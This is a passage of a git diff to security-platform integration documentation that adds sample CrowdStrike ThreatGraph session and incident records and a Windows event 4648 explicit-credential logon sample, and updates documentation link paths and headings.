-90-0-1|83212\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"S-1-5-90-0-1|83212\",\"direction\":\"out\",\"edge_id\":\"KZm:#_CuCKi=crhVJ-[Hi;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%'\\\";HWE\\\\hK)TKK@Ja0+LFZCI_&!(eo>-LOP/PtAeWZBOJ1Y0U*]5Pk6ra*Gdk3JG6dZI]\\\\K%f-i6<7Z\\\\![>1Y0U*]5Pk6ra*Gdk3JE`gl\\\\rW5um]HO@mLoXRZ`!!<<'\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"established_user_session\",\"timestamp\":\"2022-07-18T09:50:33Z\",\"properties\":{\"LogonTime\":\"2022-07-18T09:35:03.015Z\",\"LogonType\":\"2\",\"UserIsAdmin\":\"0\",\"UserName\":\"UMFD-1\",\"UserPrincipal\":\"\"}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-90-0-3%7C8097548&scope=device\",\"id\":\"uses:835449907c99453085a924a16e967be5:S-1-5-90-0-3|8097548\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"S-1-5-90-0-3|8097548\",\"direction\":\"out\",\"edge_id\":\"KZm:#_CuCKi=crh->=-si;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%Ot`@k^R;>+rfg&K$2nq\\\"456ipPR,LVK2FM\\\",e'D/,>KA*-AH?W)cMZ8D@\\\\!!*'!\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"established_user_session\",\"timestamp\":\"2022-07-18T09:50:33Z\",\"properties\":{\"LogonTime\":\"2022-07-18T09:46:32.280Z\",\"LogonType\":\"2\",\"UserIsAdmin\":\"0\",\"UserName\":\"UMFD-3\",\"UserPrincipal\":\"\"}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-21-2334176487-1093172873-1803758148-1000%7C27181909&scope=device\",\"id\":\"uses:835449907c99453085a924a16e967be5:S-1-5-21-2334176487-1093172873-1803758148-1000|27181909\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"S-1-5-21-2334176487-1093172873-1803758148-1000|27181909\",\"direction\":\"out\",\"edge_id\":\"KZmXm^d&;ti=ug_cXi9L%2VjrCr9H#76G(l^ruhDMrs;W&NI%7/thctFPrRiR'U>dJn!rc-Nd4LV=*ri;lF2!Z\\\"2?31i[d/pMsGcTg;'O$:\\\"1OYFD\\\"hV;6>9Y+\\\\(U:Z!%aA6.b,O_lhHcCESa;hDH`$U42@\\\\cE]Do+ncd#)<1$NL2,rr\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"established_user_session\",\"timestamp\":\"2022-07-18T19:46:23Z\",\"properties\":{\"LogonTime\":\"2022-07-18T19:46:21.198Z\",\"LogonType\":\"2\",\"UserIsAdmin\":\"0\",\"UserName\":\"DWM-4\",\"UserPrincipal\":\"\"}}],\"implicated_by_incident\":[{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3Ac46079f88e0643f3a7a1a75897d193f7&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:c46079f88e0643f3a7a1a75897d193f7\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"c46079f88e0643f3a7a1a75897d193f7\",\"direction\":\"out\",\"edge_id\":\"KZr8O__;KaiK^5&s\\\"4s!gB#-mksHj5MJ\\\"SaJXko@pVK^,s)Sh8#d>)\\\\6K\\\"$3EMAIi4,2N#X(JtF)Cnp[mK8^Vlb8-s/Y6=qL6*OR]ZFRf0U3B<<3FrppFLH!j[XcIKKQMs8N\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"implicated_by_incident\",\"timestamp\":\"2022-07-18T17:48:23Z\",\"properties\":{}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3Adaf413dba4ef43148167ee6d244ad364&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:daf413dba4ef43148167ee6d244ad364\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"daf413dba4ef43148167ee6d244ad364\",\"direction\":\"out\",\"edge_id\":\"KZr8O__;KaiKY\\\\Sa4=NC.$apdgX(^P-kt!6kQ3cjL[Tp=YP9%^b\\\\#5\\\")%47l\\\\&OGsVL;7N*EJa&?3rh5.)S'V]b;PA\\\"/!!*'!\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"implicated_by_incident\",\"timestamp\":\"2022-07-23T21:05:32Z\",\"properties\":{}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A1c61fb60a33a4fecb65adcf8e96bbca3&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:1c61fb60a33a4fecb65adcf8e96bbca3\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"1c61fb60a33a4fecb65adcf8e96bbca3\",\"direction\":\"out\",\"edge_id\":\"KZm;n_a\\\"Jmd4K&PSagPDW+/);%K-Qd6CG4t\\\\q/Z*bB`'eCAn\\\\%el8>uC1Dk3VHYj@<9^!%401L'?GR18>el/s*>pJG1QISImUoC8hpGuqUT%AS>dZG,,V>XS7!T4MeeFj=O!<<'\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"implicated_by_incident\",\"timestamp\":\"2022-07-24T04:01:51Z\",\"properties\":{}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A068b5e72e5624d39b71e03aa0c385c02&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:068b5e72e5624d39b71e03aa0c385c02\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"068b5e72e5624d39b71e03aa0c385c02\",\"direction\":\"out\",\"edge_id\":\"KZq\\\\t\\\"#13LiKbbDqV,Td=k5mC)0-PqJ`,5aBjffnn\\\\+GP[JmP^(hOn!2Q27k>8rTm`\\\\N`qLL\\\"QJ/&41pV'U+#X4n=^kjB!f.A6'S4T?r0b&tr&;.nD$o@h9]bTK0$!l$Y[`Zda*b231!!<<'\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"implicated_by_incident\",\"timestamp\":\"2022-07-24T11:05:05Z\",\"properties\":{}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A3ba3560a57994112a66c91e4e4e66f13&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:3ba3560a57994112a66c91e4e4e66f13\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"3ba3560a57994112a66c91e4e4e66f13\",\"direction\":\"out\",\"edge_id\":\"KZl^h!\\\\k*Qi@?5AT=\\\",D6`(M?TZ+km#h$&kn,W(2O71>#cfWZVP5\\\\Ro9MfM']Tc5[VP:C5\\\\od;.hXFhKNnO.RVWpq2h-EaR=a8J)%**N1p(udPF_<1'[/;7\\\\Xnd4%Ia%E3,C4j![?=r-0%.O=l!%&[$5=-si;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%Ot`@k^R;>'_r\\\"+3`-a]]Rj_09,,cO],pXWF.4E@m!!*'!\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"established_user_session\", \"timestamp\": \"2022-07-18T09:50:33Z\", \"properties\": {\"LogonTime\": \"2022-07-18T09:35:03.448Z\", \"LogonType\": \"5\", \"UserIsAdmin\": \"0\", \"UserName\": \"hbmwcsfghmml-vm$\", \"UserPrincipal\": \"\"}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-90-0-1%7C83212&scope=device\", \"id\": \"uses:835449907c99453085a924a16e967be5:S-1-5-90-0-1|83212\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"S-1-5-90-0-1|83212\", \"direction\": \"out\", \"edge_id\": \"KZm:#_CuCKi=crhVJ-[Hi;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%'\\\";HWE\\\\hK)TKK@Ja0+LFZCI_&!(eo>-LOP/PtAeWZBOJ1Y0U*]5Pk6ra*Gdk3JG6dZI]\\\\K%f-i6<7Z\\\\![>1Y0U*]5Pk6ra*Gdk3JE`gl\\\\rW5um]HO@mLoXRZ`!!<<'\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"established_user_session\", \"timestamp\": \"2022-07-18T09:50:33Z\", \"properties\": {\"LogonTime\": \"2022-07-18T09:35:03.015Z\", \"LogonType\": \"2\", \"UserIsAdmin\": \"0\", \"UserName\": \"UMFD-1\", \"UserPrincipal\": \"\"}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-90-0-3%7C8097548&scope=device\", \"id\": \"uses:835449907c99453085a924a16e967be5:S-1-5-90-0-3|8097548\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"S-1-5-90-0-3|8097548\", \"direction\": \"out\", \"edge_id\": \"KZm:#_CuCKi=crh->=-si;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%Ot`@k^R;>+rfg&K$2nq\\\"456ipPR,LVK2FM\\\",e'D/,>KA*-AH?W)cMZ8D@\\\\!!*'!\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"established_user_session\", \"timestamp\": \"2022-07-18T09:50:33Z\", \"properties\": {\"LogonTime\": \"2022-07-18T09:46:32.280Z\", \"LogonType\": \"2\", \"UserIsAdmin\": \"0\", \"UserName\": \"UMFD-3\", \"UserPrincipal\": \"\"}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-21-2334176487-1093172873-1803758148-1000%7C27181909&scope=device\", \"id\": \"uses:835449907c99453085a924a16e967be5:S-1-5-21-2334176487-1093172873-1803758148-1000|27181909\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"S-1-5-21-2334176487-1093172873-1803758148-1000|27181909\", \"direction\": \"out\", \"edge_id\": \"KZmXm^d&;ti=ug_cXi9L%2VjrCr9H#76G(l^ruhDMrs;W&NI%7/thctFPrRiR'U>dJn!rc-Nd4LV=*ri;lF2!Z\\\"2?31i[d/pMsGcTg;'O$:\\\"1OYFD\\\"hV;6>9Y+\\\\(U:Z!%aA6.b,O_lhHcCESa;hDH`$U42@\\\\cE]Do+ncd#)<1$NL2,rr\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"established_user_session\", \"timestamp\": \"2022-07-18T19:46:23Z\", \"properties\": {\"LogonTime\": \"2022-07-18T19:46:21.198Z\", \"LogonType\": \"2\", \"UserIsAdmin\": \"0\", \"UserName\": \"DWM-4\", \"UserPrincipal\": \"\"}}], \"implicated_by_incident\": [{\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3Ac46079f88e0643f3a7a1a75897d193f7&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:c46079f88e0643f3a7a1a75897d193f7\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"c46079f88e0643f3a7a1a75897d193f7\", \"direction\": \"out\", \"edge_id\": \"KZr8O__;KaiK^5&s\\\"4s!gB#-mksHj5MJ\\\"SaJXko@pVK^,s)Sh8#d>)\\\\6K\\\"$3EMAIi4,2N#X(JtF)Cnp[mK8^Vlb8-s/Y6=qL6*OR]ZFRf0U3B<<3FrppFLH!j[XcIKKQMs8N\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"implicated_by_incident\", \"timestamp\": \"2022-07-18T17:48:23Z\", \"properties\": {}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3Adaf413dba4ef43148167ee6d244ad364&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:daf413dba4ef43148167ee6d244ad364\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"daf413dba4ef43148167ee6d244ad364\", \"direction\": \"out\", \"edge_id\": \"KZr8O__;KaiKY\\\\Sa4=NC.$apdgX(^P-kt!6kQ3cjL[Tp=YP9%^b\\\\#5\\\")%47l\\\\&OGsVL;7N*EJa&?3rh5.)S'V]b;PA\\\"/!!*'!\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"implicated_by_incident\", \"timestamp\": \"2022-07-23T21:05:32Z\", \"properties\": {}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A1c61fb60a33a4fecb65adcf8e96bbca3&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:1c61fb60a33a4fecb65adcf8e96bbca3\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"1c61fb60a33a4fecb65adcf8e96bbca3\", \"direction\": \"out\", \"edge_id\": \"KZm;n_a\\\"Jmd4K&PSagPDW+/);%K-Qd6CG4t\\\\q/Z*bB`'eCAn\\\\%el8>uC1Dk3VHYj@<9^!%401L'?GR18>el/s*>pJG1QISImUoC8hpGuqUT%AS>dZG,,V>XS7!T4MeeFj=O!<<'\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"implicated_by_incident\", \"timestamp\": \"2022-07-24T04:01:51Z\", \"properties\": {}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A068b5e72e5624d39b71e03aa0c385c02&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:068b5e72e5624d39b71e03aa0c385c02\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"068b5e72e5624d39b71e03aa0c385c02\", \"direction\": \"out\", \"edge_id\": \"KZq\\\\t\\\"#13LiKbbDqV,Td=k5mC)0-PqJ`,5aBjffnn\\\\+GP[JmP^(hOn!2Q27k>8rTm`\\\\N`qLL\\\"QJ/&41pV'U+#X4n=^kjB!f.A6'S4T?r0b&tr&;.nD$o@h9]bTK0$!l$Y[`Zda*b231!!<<'\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"implicated_by_incident\", \"timestamp\": \"2022-07-24T11:05:05Z\", \"properties\": {}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A3ba3560a57994112a66c91e4e4e66f13&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:3ba3560a57994112a66c91e4e4e66f13\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"3ba3560a57994112a66c91e4e4e66f13\", \"direction\": \"out\", \"edge_id\": \"KZl^h!\\\\k*Qi@?5AT=\\\",D6`(M?TZ+km#h$&kn,W(2O71>#cf4648001254400x8020000000000000185982314Securitydd.example.orgS-1-5-21-1111111111-2222222222-333333333-44444OktaServiceEXAMPLE0x23b659{bcd3f290-9f73-4e62-a998-475e7db8384c}JDOEXAMPLE{bcd3f290-9f73-4e62-a998-475e7db8384c}localhostlocalhost0x15bcC:\\\\Program Files (x86)\\\\Okta\\\\Okta AD Agent\\\\OktaAgentService.exe--\"}}\n", + "event": { + "code": "4648", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 4648, + "name": "A logon was attempted using explicit credentials", + "outcome": "success", + "properties": [ + { + "opcode": 0 + } + ], + "record_id": 185982314, + "type": "Security" + }, + "azure_windows": { + "event_data": { + "IpAddress": "-", + "IpPort": "-", + "LogonGuid": "{bcd3f290-9f73-4e62-a998-475e7db8384c}", + "ProcessId": "0x15bc", + "ProcessName": "C:\\Program Files (x86)\\Okta\\Okta AD Agent\\OktaAgentService.exe", + "SubjectDomainName": "EXAMPLE", + "SubjectLogonId": "0x23b659", + "SubjectUserName": "OktaService", + "SubjectUserSid": "S-1-5-21-1111111111-2222222222-333333333-44444", + "TargetDomainName": "EXAMPLE", + "TargetInfo": "localhost", + "TargetLogonGuid": "{bcd3f290-9f73-4e62-a998-475e7db8384c}", + "TargetServerName": "localhost", + "TargetUserName": "JDO" + }, + "opcode": "0", + "provider_guid": "54849625-5478-4994-a5ba-3e3b0328c30d", + "provider_name": "Microsoft-Windows-Security-Auditing", + "task": "12544" + }, + "host": { + "hostname": "dd.example.org", + "name": "dd.example.org" + }, + "log": { + "hostname": "dd.example.org" + }, "os": { "family": "windows", "platform": "windows" }, - "sekoiaio": { - "intake": { - "parsing_warnings": [ - "No fields extracted from original event" - ] + "process": { + "parent": { + "pid": 5564 + }, + "pid": 740, + "thread": { + "id": 1408 } + }, + "related": { + "hosts": [ + "dd.example.org" + ], + "user": [ + "OktaService" + ] + }, + "user": { + "domain": "EXAMPLE", + "id": "S-1-5-21-1111111111-2222222222-333333333-44444", + "name": "OktaService" } } diff --git a/_shared_content/operations_center/integrations/generated/2815eaab-2425-4eff-8038-3f7d5a3b8b11_sample.md b/_shared_content/operations_center/integrations/generated/2815eaab-2425-4eff-8038-3f7d5a3b8b11_sample.md index 2d583dffa9..376cc30460 100644 --- a/_shared_content/operations_center/integrations/generated/2815eaab-2425-4eff-8038-3f7d5a3b8b11_sample.md +++ b/_shared_content/operations_center/integrations/generated/2815eaab-2425-4eff-8038-3f7d5a3b8b11_sample.md @@ -33,41 +33,30 @@ In this section, you will find examples of raw logs as generated natively by the -=== "invalid_message" +=== "event_4648" ```json { - "time": "2022-03-25T09:08:59.2405321Z", - "resourceId": "/subscriptions/6c5a0310-d590-4fb4-945a-bca5dc5e1417/resourceGroups/MyGroup/providers/Microsoft.Storage/storageAccounts/MyStorageAccount/blobServices/default", - "category": "StorageRead", - "operationName": "GetBlob", - "schemaVersion": "1.0", - "statusCode": 404, - "statusText": "BlobNotFound", - "durationMs": 1, - "callerIpAddress": "1.2.3.4", - "correlationId": "165e8a9d-e08f-43ca-b71b-c2738d24eb66", - "identity": { - "type": "SAS", - "tokenHash": "system-1(D0B3B275891800D74D0362E6A5CEAEEDD93A110636EFF4CC84CFD05396904C1C),SasSignature(B35B17A0B56ABEDF5D04E11B2AE08EBEC2DEC076742040412D3C034880A3D745)" - }, - "location": "MyLocation", + "time": "2024-07-17T08:33:57.4960858Z", + "category": "WindowsEventLogsTable", + "level": "Informational", "properties": { - "accountName": "MyStorageAccount", - "userAgentHeader": "AzSerialConsoleSvcPF", - "serviceType": "blob", - "objectKey": "/MyStorageAccount/bootdiagnostics-xxxxxx-84a8d62f-e62c-4001-9ce2-e6a3e25f4f88/XXXXXX.84a8d62f-e62c-4001-9ce2-e6a3e25f4f88.serialconsole-connectionmetadata", - "lastModifiedTime": "1601/01/01 00:00:00.0000000", - "metricResponseType": "ClientOtherError", - "serverLatencyMs": 1, - "requestHeaderSize": 411, - "responseHeaderSize": 172, - "tlsVersion": "TLS 1.2" - }, - "uri": "https://axenspiproddiag.blob.core.windows.net/bootdiagnostics-azntpi84a8d62f-e62c-4001-9ce2-e6a3e25f4f88/AZNTPI-04.84a8d62f-e62c-4001-9ce2-e6a3e25f4f88.serialconsole-connectionmetadata?sv=2018-03-28&sr=c&sk=system-1&sig=XXXXX&se=9999-01-01T00%3A00%3A00Z&sp=rwd", - "protocol": "HTTPS", - "resourceType": "Microsoft.Storage/storageAccounts/blobServices" + "DeploymentId": "43920203-5403-4d1a-8d59-543458490770", + "Role": "IaaS", + "RoleInstance": "_EX-AZU-NL-PA", + "ProviderGuid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "ProviderName": "Microsoft-Windows-Security-Auditing", + "EventId": 4648, + "Level": 0, + "Pid": 740, + "Tid": 1408, + "Opcode": 0, + "Task": 12544, + "Channel": "Security", + "Description": "A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-333333333-44444\r\n\tAccount Name:\t\tOktaService\r\n\tAccount Domain:\t\tEXAMPLE\r\n\tLogon ID:\t\t0x111111\r\n\tLogon GUID:\t\t{bcd3f290-9f73-4e62-a998-475e7db8384c}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tJDO\r\n\tAccount Domain:\t\tEXAMPLE\r\n\tLogon GUID:\t\t{bcd3f290-9f73-4e62-a998-475e7db8384c}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x15bc\r\n\tProcess Name:\t\tC:\\Program Files (x86)\\Okta\\Okta AD Agent\\OktaAgentService.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\u2019s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.", + "RawXml": "4648001254400x8020000000000000185982314Securitydd.example.orgS-1-5-21-1111111111-2222222222-333333333-44444OktaServiceEXAMPLE0x23b659{bcd3f290-9f73-4e62-a998-475e7db8384c}JDOEXAMPLE{bcd3f290-9f73-4e62-a998-475e7db8384c}localhostlocalhost0x15bcC:\\Program Files (x86)\\Okta\\Okta AD Agent\\OktaAgentService.exe--" + } } ``` diff --git a/_shared_content/operations_center/integrations/generated/2886cd2d-f686-4e7d-9976-250cba2eaf5b.md b/_shared_content/operations_center/integrations/generated/2886cd2d-f686-4e7d-9976-250cba2eaf5b.md index 804403164e..50243211e8 100644 --- a/_shared_content/operations_center/integrations/generated/2886cd2d-f686-4e7d-9976-250cba2eaf5b.md +++ b/_shared_content/operations_center/integrations/generated/2886cd2d-f686-4e7d-9976-250cba2eaf5b.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event.json" diff --git a/_shared_content/operations_center/integrations/generated/2b13307b-7439-4973-900a-2b58303cac90.md b/_shared_content/operations_center/integrations/generated/2b13307b-7439-4973-900a-2b58303cac90.md index 6488cf0104..7051890eb7 100644 --- a/_shared_content/operations_center/integrations/generated/2b13307b-7439-4973-900a-2b58303cac90.md +++ b/_shared_content/operations_center/integrations/generated/2b13307b-7439-4973-900a-2b58303cac90.md @@ -31,7 +31,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "AUTH_CONNECTION_disconnected.json" diff --git a/_shared_content/operations_center/integrations/generated/2e9d87ed-6606-445a-90d1-9c7695b28335.md b/_shared_content/operations_center/integrations/generated/2e9d87ed-6606-445a-90d1-9c7695b28335.md index bdac34a35c..0348bae27d 100644 --- a/_shared_content/operations_center/integrations/generated/2e9d87ed-6606-445a-90d1-9c7695b28335.md +++ b/_shared_content/operations_center/integrations/generated/2e9d87ed-6606-445a-90d1-9c7695b28335.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_bounced.json" diff --git a/_shared_content/operations_center/integrations/generated/2ee6048e-8322-4575-8e47-1574946412b6.md b/_shared_content/operations_center/integrations/generated/2ee6048e-8322-4575-8e47-1574946412b6.md index 3bf28c6eab..de3d50124e 100644 --- a/_shared_content/operations_center/integrations/generated/2ee6048e-8322-4575-8e47-1574946412b6.md +++ b/_shared_content/operations_center/integrations/generated/2ee6048e-8322-4575-8e47-1574946412b6.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_attachments_details.json" diff --git a/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a.md b/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a.md index 88954c8f17..7a7a85e8e0 100644 --- a/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a.md +++ b/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -26,10 +26,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_alert_1.json" @@ -1010,7 +1009,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### 